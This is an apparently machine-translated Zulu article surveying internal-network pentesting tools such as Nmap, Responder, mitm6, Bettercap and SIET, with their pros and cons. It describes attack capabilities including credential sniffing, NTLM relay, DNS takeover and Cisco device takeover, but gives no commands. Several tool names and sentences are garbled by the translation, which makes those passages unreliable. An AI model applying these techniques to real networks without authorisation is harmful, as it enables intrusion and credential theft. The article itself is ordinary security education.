Amathuluzi enethiwekhi, noma ungaqala kuphi njenge-pentester?

Ikhithi yamathuluzi ye-novice pentester: sethula inhlabamkhosi emfishane yamathuluzi asemqoka azoba wusizo lapho uhlola inethiwekhi yangaphakathi. Lawa mathuluzi asevele esetshenziswa ngenkuthalo ochwepheshe abahlukahlukene, ngakho-ke kuzoba usizo kuwo wonke umuntu ukwazi ngamakhono abo futhi awazi kahle kahle.

Okuqukethwe:

• I-Nmap
• Zmap
• UMascan
• I-Nessus
• I-Net-Credits
• network-miner
• umtm6
• impendulo
• Evil_Foca
• I-Bettercap
• isitholi_sesango
• i-mitmproxy
• ISIKHOMBISA
• yersinia
• ama-proxychains

I-Nmap

I-Nmap – insiza evulekile yokuskena amanethiwekhi, ingelinye lamathuluzi aziwa kakhulu phakathi kochwepheshe bezokuphepha nabaphathi besistimu. Isetshenziselwa ikakhulukazi ukuskena kwechweba, kodwa ngaphandle kwalokhu, inenani elikhulu lemisebenzi ewusizo, okuyiyona nto eyenziwa yi-Nmap. umvuni omkhulu ucwaningo lwenethiwekhi.

Ngokungeziwe ekuhloleni izimbobo ezivuliwe/ezivaliwe, i-nmap ingakwazi ukuhlonza ukulalela kwesevisi endaweni evulekile kanye nenguqulo yayo, futhi ngezinye izikhathi isiza ukucacisa i-OS. I-Nmap inosekelo lokuskena imibhalo (NSE - Nmap Scripting Engine). Usebenzisa imibhalo, kungenzeka ukuhlola ubungozi bezinsizakalo ezahlukahlukene (uma, kunjalo, kuneskripthi sabo, noma ungahlala ubhala eyakho) noma ukubuyisela amaphasiwedi ezinsizakalo ezahlukahlukene.

Ngakho-ke, i-Nmap ikuvumela ukuthi udale imephu enemininingwane yenethiwekhi, uthole ulwazi oluningi mayelana nokusebenzisa amasevisi kubabungazi kunethiwekhi, futhi uhlole ngokuqhubekayo ubungozi obuthile. I-Nmap futhi inezilungiselelo zokuskena eziguquguqukayo; ungamisa isivinini sokuskena, inombolo yochungechunge, inani lamaqembu azoskenwa, njll.
Ilungele ukuskena amanethiwekhi amancane futhi ibalulekile ekuskeneni kwendawo yabasingathi abangabodwana.

Izinzuzo:

• Isebenza ngokushesha ngohlu oluncane lwabasingathi;
• Ukuguquguquka kwezilungiselelo - ungahlanganisa izinketho ngendlela yokuthola idatha efundisa kakhulu ngesikhathi esamukelekile;
• Ukuskena okuhambisanayo - uhlu lwabasingathi okuqondiwe luhlukaniswa ngamaqembu, bese iqembu ngalinye liskenwa ngokushintshana, ukuskena okuhambisanayo kusetshenziswa ngaphakathi kweqembu. Futhi ukuhlukaniswa ngamaqembu kuwububi obuncane (bheka ngezansi);
• Amasethi achazwe ngaphambilini ezikripthi zemisebenzi ehlukene - akudingekile ukuba uchithe isikhathi esiningi ukhetha imibhalo ethile, kodwa ucacise amaqembu emibhalo;
• Imiphumela yomphumela - amafomethi ahlukene angu-5, kuhlanganise ne-XML, engangeniswa kwamanye amathuluzi;

Umthengi:

• Ukuskena iqembu labasingathi - ulwazi olumayelana nanoma yimuphi umsingathi alutholakali kuze kuqedwe ukuskenwa kweqembu lonke. Lokhu kungaxazululwa ngokusetha ezinkethweni usayizi weqembu omkhulu kanye nesikhawu esiphezulu sesikhathi lapho impendulo yesicelo izolindelwa khona ngaphambi kokumisa imizamo noma ukwenza esinye;
• Lapho iskena, i-Nmap ithumela amaphakethe e-SYN embobeni eqondiwe futhi ilinde noma iyiphi iphakethe lempendulo noma ukuphela kwesikhathi uma kungekho mpendulo. Lokhu kuthinta kabi ukusebenza kwesithwebuli sisonke, uma kuqhathaniswa nezikena ezingavumelanisi (isibonelo, i-zmap noma i-mascan);
• Uma uskena amanethiwekhi amakhulu, ukusebenzisa amafulegi ukusheshisa ukuskena (-min-rate, --min-parallelism) kungase kukhiqize imiphumela engemihle-emibi, engekho izimbobo ezivulekile kumsingathi. Futhi, lezi zinketho kufanele zisetshenziswe ngokuqapha, njengoba inani elikhulu lephakethe lingaholela ku-DoS engahlosiwe.

Zmap

Zmap (akumele kudidaniswe ne-ZenMap) - futhi isithwebuli somthombo ovulekile, esidalwe njengenye indlela esheshayo ye-Nmap.

Ngokungafani ne-nmap, lapho ithumela amaphakethe e-SYN, i-Zmap ayilindi kuze kubuye impendulo, kodwa iyaqhubeka nokuskena, ngesikhathi esifanayo ilinde izimpendulo ezivela kubo bonke ababungazi, ngakho empeleni ayigcini isimo sokuxhuma. Lapho impendulo yephakethe le-SYN ifika, i-Zmap izoqonda kusukela kokuqukethwe kwephakethe ukuthi iyiphi imbobo evuliwe nokuthi yimuphi umsingathi. Ukwengeza, i-Zmap ithumela kuphela iphakethe elilodwa le-SYN ngembobo ngayinye iskenwa. Kungenzeka futhi ukusebenzisa i-PF_RING ukuskena ngokushesha amanethiwekhi amakhulu uma kungenzeka ube ne-interface ye-10-Gigabit kanye nekhadi lenethiwekhi elihambisanayo eduze.

Izinzuzo:

• Isivinini sokuskena;
• I-Zmap ikhiqiza ozimele be-Ethernet ngokudlula isitaki sesistimu ye-TCP/IP;
• Amathuba okusebenzisa PF_RING;
• I-ZMap yenza okungahleliwe okuhlosiwe ukuze kusabalalise ngokulinganayo umthwalo ohlangothini oluskeniwe;
• Amathuba okuhlanganiswa ne-ZGrab (ithuluzi lokuqoqa ulwazi mayelana nezinsizakalo ezingeni lesicelo se-L7).

Umthengi:

• Kungabangela ukuphika kwesevisi yemishini yenethiwekhi, isibonelo, ukubhubhisa ama-routers aphakathi, naphezu komthwalo osakazwayo, ngoba wonke amaphakethe azodlula kumzila owodwa.

UMascan

UMascan - ngokumangazayo, kuphinde kube isithwebuli somthombo ovulekile, esadalwa ngenhloso eyodwa - ukuskena i-inthanethi ngokushesha okukhulu (ngaphansi kwemizuzu engu-6 ngesivinini esingamaphakethe angu-10 million/s). Empeleni isebenza ngokufana ne-Zmap, ngokushesha nje kuphela.

Izinzuzo:

• I-syntax iyafana ne-Nmap, futhi uhlelo luphinde lusekele ezinye izinketho ezihambisana ne-Nmap;
• Isivinini sokusebenza - esinye sezikena ezishesha kakhulu ze-asynchronous.
• Indlela yokuskena eguquguqukayo - iqalisa kabusha ukuskena okuphazamisile, isabalalisa umthwalo kuwo wonke amadivayisi ambalwa (njengaku-Zmap).

Umthengi:

• Njenge-Zmap, umthwalo kunethiwekhi ngokwayo uphezulu kakhulu, okungaholela ku-DoS;
• Ngokuzenzakalelayo, alikho ikhono lokuskena kusendlalelo sohlelo lokusebenza lwe-L7;

I-Nessus

I-Nessus — isithwebuli sokushintsha ukuskena nokutholwa kobungozi obaziwayo ohlelweni. Ngenkathi umthombo uvaliwe, kukhona inguqulo yamahhala ye-Nessus Home ekuvumela ukuthi uskene amakheli e-IP angafika kwangu-16 ngesivinini esifanayo nokuhlaziywa okunemininingwane njengenguqulo ekhokhelwe.

Iyakwazi ukuhlonza izinguqulo ezisengozini yamasevisi noma amaseva, ithole amaphutha ekucushweni kwesistimu, futhi yenze i-bruteforce yamaphasiwedi esichazamazwi. Ingasetshenziselwa ukunquma ukulunga kwezilungiselelo zesevisi (i-imeyili, izibuyekezo, njll.), kanye nokulungiselela ukuhlolwa kwe-PCI DSS. Ngaphezu kwalokho, ungakwazi ukudlulisa imininingwane yosokhaya ku-Nessus (i-SSH noma i-akhawunti yesizinda ku-Active Directory) futhi iskena sizokwazi ukufinyelela kumsingathi futhi sihlole kuyo ngokuqondile, le nketho ibizwa ngokuthi ukuskena kokuqinisekisa. Ilungele izinkampani ezenza ucwaningo lwamanethiwekhi azo.

Izinzuzo:

• Izimo ezihlukene zobungozi ngakunye, isizindalwazi sakhona esibuyekezwa njalo;
• Umphumela wemiphumela - umbhalo ongenalutho, i-XML, i-HTML ne-LaTeX;
• I-API Nessus - ikuvumela ukuthi wenze ngokuzenzakalelayo izinqubo zokuskena nokuthola imiphumela;
• Iskena sokuqinisekisa, ungasebenzisa imininingwane ye-Windows noma ye-Linux ukuze uhlole izibuyekezo noma obunye ubungozi;
• Ikhono lokubhala amamojula akho okuvikela akhelwe ngaphakathi - isithwebuli sinolimi lwaso lokubhala i-NASL (Nessus Attack Scripting Language);
• Ungasetha isikhathi sokuskena okuvamile kwenethiwekhi yendawo - ngenxa yalokhu, Isevisi Yokuphepha Kolwazi izoqaphela zonke izinguquko ekucushweni kwezokuphepha, ukuvela kwababungazi abasha kanye nokusetshenziswa kwesichazamazwi noma amaphasiwedi azenzakalelayo.

Umthengi:

• Kungase kube khona ukungasebenzi kahle ekusebenzeni kwezinhlelo eziskenwayo - udinga ukusebenza ngokucophelela ngenketho yokuhlola okuphephile ivaliwe;
• Inguqulo yezohwebo ayimahhala.

I-Net-Credits

I-Net-Credits iyithuluzi ku-Python lokuqoqa amaphasiwedi nama-hashes, kanye nolunye ulwazi, isibonelo, ama-URL avakashelwe, amafayela alandiwe kanye nolunye ulwazi oluvela kuthrafikhi, kokubili ngesikhathi sangempela ngesikhathi sokuhlasela kwe-MiTM, kanye namafayela e-PCAP agcinwe ngaphambilini. Ifanele ukuhlaziya okusheshayo nokukha phezulu kwenani elikhulu lethrafikhi, isibonelo, ngesikhathi sokuhlaselwa kwe-MiTM yenethiwekhi, lapho isikhathi sinqunyelwe, nokuhlaziya okwenziwa ngesandla kusetshenziswa i-Wireshark kudinga isikhathi esiningi.

Izinzuzo:

• Ukuhlonza isevisi kusekelwe ekuhlaziyweni kwephakethe esikhundleni sokuhlonza isevisi ngenombolo yechweba esetshenzisiwe;
• Kulula ukuyisebenzisa;
• Uhlu olubanzi lwedatha ekhishiwe - okuhlanganisa ukungena ngemvume namagama ayimfihlo e-FTP, POP, IMAP, SMTP, NTLMv1/v2 protocol, kanye nolwazi oluvela kuzicelo ze-HTTP, njengamafomu okungena kanye ne-auth eyisisekelo;

network-miner

network-miner - i-analogue ye-Net-Creds mayelana nokusebenza, kodwa inokusebenza okukhulu, isibonelo, kungenzeka ukukhipha amafayela adluliselwe nge-SMB protocol. Njenge-Net-Creds, kulula uma udinga ukuhlaziya ngokushesha umthamo omkhulu wethrafikhi. Iphinde ibe nesithombe esibonakalayo esisebenziseka kalula.

Izinzuzo:

• Isikhombikubona sokuqhafaza;
• Ukubona ngeso lengqondo nokuhlukaniswa kwedatha ngamaqembu kwenza ukuhlaziywa kwethrafikhi kube lula futhi kukwenze kusheshe.

Umthengi:

• Inguqulo yesilingo inomsebenzi olinganiselwe.

umtm6

umtm6 - ithuluzi lokuhlasela ku-IPv6 (SLAAC-attack). I-IPv6 ibalulekile ku-Windows OS (ngokuvamile nakwamanye amasistimu wokusebenza), futhi ekucushweni okuzenzakalelayo isixhumi esibonakalayo se-IPv6 sivuliwe, lokhu kuvumela umhlaseli ukuthi afakele iseva yakhe ye-DNS yesisulu esebenzisa amaphakethe Esikhangiso Somzila, emva kwalokho umhlaseli uyakwazi ukonakalisa i-DNS yesisulu . Iphelele ngokwenza ukuhlasela kwe-Relay kanye nensiza ye-ntlmrelayx, ekuvumela ukuthi uhlasele ngempumelelo amanethiwekhi weWindows.

Izinzuzo:

• Isebenza kahle kumanethiwekhi amaningi ngokunembile ngenxa yokucushwa okujwayelekile kwama-Windows host namanethiwekhi;

impendulo

impendulo - ithuluzi lokukhohlisa izivumelwano zokuxazulula amagama okusakaza (LLMNR, NetBIOS, MDNS). Ithuluzi elibalulekile kumanethiwekhi ohlu lwemibhalo olusebenzayo. Ngaphezu kokukhwabanisa, ingakwazi ukuvimba ukuqinisekiswa kwe-NTLM; futhi iza nesethi yamathuluzi okuqoqa ulwazi nokusebenzisa ukuhlasela kwe-NTLM-Relay.

Izinzuzo:

• Ngokuzenzakalelayo, iphakamisa amaseva amaningi ngokusekelwa kokuqinisekisa kwe-NTLM: SMB, MSSQL, HTTP, HTTPS, LDAP, FTP, POP3, IMAP, SMTP;
• Ivumela i-DNS spoofing esimweni sokuhlaselwa kwe-MITM (i-ARP spoofing, njll.);
• Izigxivizo zeminwe zabasingathi abenze isicelo sokusakaza;
• Imodi yokuhlaziya - yokuqapha izicelo;
• Ifomethi ye-hashes ebanjiwe yokuqinisekisa kwe-NTLM ihambisana no-John the Ripper kanye ne-Hashcat.

Umthengi:

• Uma isebenza ngaphansi kwe-Windows, ukubophezela kwe-port 445 (SMB) kugcwele ubunzima obuthile (kudinga ukumisa izinsiza ezihambisanayo nokuqalisa kabusha);

Evil_Foca

Okubi Foca - ithuluzi lokuhlola ukuhlaselwa kwenethiwekhi okuhlukahlukene kumanethiwekhi e-IPv4 kanye ne-IPv6. Iskena inethiwekhi yendawo, ihlonze amadivaysi, amarutha kanye nenethiwekhi yawo yokuxhumana, ngemuva kwalokho kungenzeka ukuhlasela okuhlukahlukene kubahlanganyeli benethiwekhi.

Izinzuzo:

• Ilungele ukwenza ukuhlaselwa kwe-MITM (i-ARP spoofing, umjovo we-DHCP ACK, ukuhlasela kwe-SLAAC, i-DHCP spoofing);
• Ungakwazi ukwenza ukuhlasela kwe-DoS - nge-ARP spoofing yamanethiwekhi e-IPv4, nge-SLAAC DoS kumanethiwekhi e-IPv6;
• Kungenzeka ukwenza ukudunwa kwe-DNS;
• Kulula ukuyisebenzisa, isikhombimsebenzisi sesithombe esisebenziseka kalula.

Umthengi:

• Isebenza kuphela ngaphansi kweWindows.

I-Bettercap

I-Bettercap - uhlaka olunamandla lokuhlaziya nokuhlasela amanethiwekhi, futhi sikhuluma ngokuhlaselwa kwamanethiwekhi angenawaya, i-BLE (amandla aphansi we-bluetooth) ngisho nokuhlasela kwe-MouseJack kumadivayisi angenawaya we-HID. Ngaphezu kwalokho, iqukethe umsebenzi wokuqoqa ulwazi kuthrafikhi (okufana ne-net-cred). Ngokuvamile, ummese waseSwitzerland (konke kokukodwa). Muva nje kusenjalo i-graphical web-based interface.

Izinzuzo:

• I-Credential sniffer - ungathola ama-URL avakashelwe nabasingathi be-HTTPS, ukuqinisekiswa kwe-HTTP, izifakazelo zamaphrothokholi amaningi ahlukene;
• Inqwaba yokuhlaselwa kwe-MITM eyakhelwe ngaphakathi;
• I-modular HTTP(S) ummeleli obala - ungaphatha ithrafikhi kuye ngezidingo zakho;
• Iseva ye-HTTP eyakhelwe ngaphakathi;
• Ukusekelwa kwama-caplets - amafayela avumela ukuhlasela okuyinkimbinkimbi nokuzenzakalelayo ukuthi kuchazwe ngolimi lokubhala.

Umthengi:

• Amanye amamojula - isibonelo, i-ble.enum - awasekelwa ngokwengxenye i-macOS ne-Windows, amanye akhelwe i-Linux kuphela - i-packet.proxy.

isitholi_sesango

isitholi sesango - Iskripthi sePython esiza ekutholeni amasango angaba khona kunethiwekhi. Iwusizo ekuhloleni ukuhlukaniswa noma ukuthola abasingathi abangasebenzisa i-subnet noma i-inthanethi oyifunayo. Ifanele ama-pentest angaphakathi uma udinga ukuhlola ngokushesha imizila engagunyaziwe noma imizila eya kwamanye amanethiwekhi endawo angaphakathi.

Izinzuzo:

• Kulula ukusebenzisa nokwenza ngendlela oyifisayo.

i-mitmproxy

i-mitmproxy - ithuluzi elivulekile lokuhlaziya ithrafikhi evikelwe kusetshenziswa i-SSL/TLS. I-mitmproxy ilungele ukuvimbela nokuguqula ithrafikhi evikelekile, yebo, ngezinye izixwayiso; Ithuluzi alikwenzi ukuhlasela kokususa ukubethela kwe-SSL/TLS. Isetshenziswa uma udinga ukuvimba futhi urekhode izinguquko kuthrafikhi evikelwe i-SSL/TLS. Iqukethe i-Mitmproxy - yethrafikhi yokuba ngummeleli, i-mitmdump - efana ne-tcpdump, kodwa yethrafikhi ye-HTTP(S), kanye ne-mitmweb - isixhumi esibonakalayo sewebhu se-Mitmproxy.

Izinzuzo:

• Isebenza ngamaphrothokholi ahlukahlukene, futhi futhi isekela ukuguqulwa kwamafomethi ahlukahlukene, ukusuka ku-HTML kuye ku-Protobuf;
• I-API yePython - ikuvumela ukuthi ubhale imibhalo yemisebenzi engajwayelekile;
• Ingasebenza ngemodi ye-proxy esobala ngokuvimba kwethrafikhi.

Umthengi:

• Ifomethi yokulahla ayihambelani nanoma yini - kunzima ukusebenzisa i-grep, kufanele ubhale imibhalo;

ISIKHOMBISA

ISIKHOMBISA - ithuluzi lokuxhaphaza amakhono we-Cisco Smart Install protocol. Kungenzeka ukuthola futhi uguqule ukucushwa, kanye ukubamba ukulawula idivayisi Cisco. Uma ukwazile ukuthola ukucushwa kwedivayisi yeCisco, ungakubheka usebenzisa I-CCAT, leli thuluzi liwusizo ekuhlaziyeni ukucushwa kokuphepha kwamadivayisi e-Cisco.

Izinzuzo:

Ukusebenzisa i-Cisco Smart Install protocol ikuvumela ukuthi:

• Shintsha ikheli leseva ye-tftp kudivayisi yeklayenti ngokuthumela iphakethe elilodwa le-TCP elingalungile;
• Kopisha ifayela lokumisa idivayisi;
• Shintsha ukucushwa kwedivayisi, isibonelo, ngokwengeza umsebenzisi omusha;
• Buyekeza isithombe se-iOS kudivayisi;
• Yenza isethi yemiyalo engahleliwe kudivayisi. Lesi isici esisha esisebenza kuphela kuzinguqulo ze-iOS 3.6.0E kanye ne-15.2(2)E;

Umthengi:

• Isebenza ngesethi elinganiselwe yamadivayisi e-Cisco, futhi udinga i-IP "emhlophe" ukuze uthole impendulo evela kudivayisi, noma kufanele ube kunethiwekhi efanayo nedivayisi;

yersinia

yersinia iwuhlaka lokuhlasela lwe-L2 oluklanyelwe ukusizakala ngamaphutha okuphepha kumaphrothokholi ahlukahlukene wenethiwekhi ye-L2.

Izinzuzo:

• Ikuvumela ukuthi uhlasele i-STP, i-CDP, i-DTP, i-DHCP, i-HSRP, i-VTP nezinye.

Umthengi:

• Akusona isixhumi esibonakalayo esisebenziseka kalula.

ama-proxychains

ama-proxychains - ithuluzi elikuvumela ukuthi uqondise kabusha ithrafikhi yohlelo lokusebenza ngommeleli othile we-SOCKS.

Izinzuzo:

• Isiza ukuqondisa kabusha ithrafikhi kwezinye izinhlelo zokusebenza ezingakwazi ukusebenza nama-proxies ngokuzenzakalelayo;

Kulesi sihloko, sibheke kafushane izinzuzo kanye nebubi bamathuluzi ayinhloko wokungena kwenethiwekhi yangaphakathi. Hlala ubukele, sihlela ukushicilela amaqoqo anjalo esikhathini esizayo: Iwebhu, isizindalwazi, izinhlelo zokusebenza zeselula - nakanjani sizobhala ngalokhu futhi.

Yabelana ngezinsiza zakho ozithandayo kumazwana!

Source: www.habr.com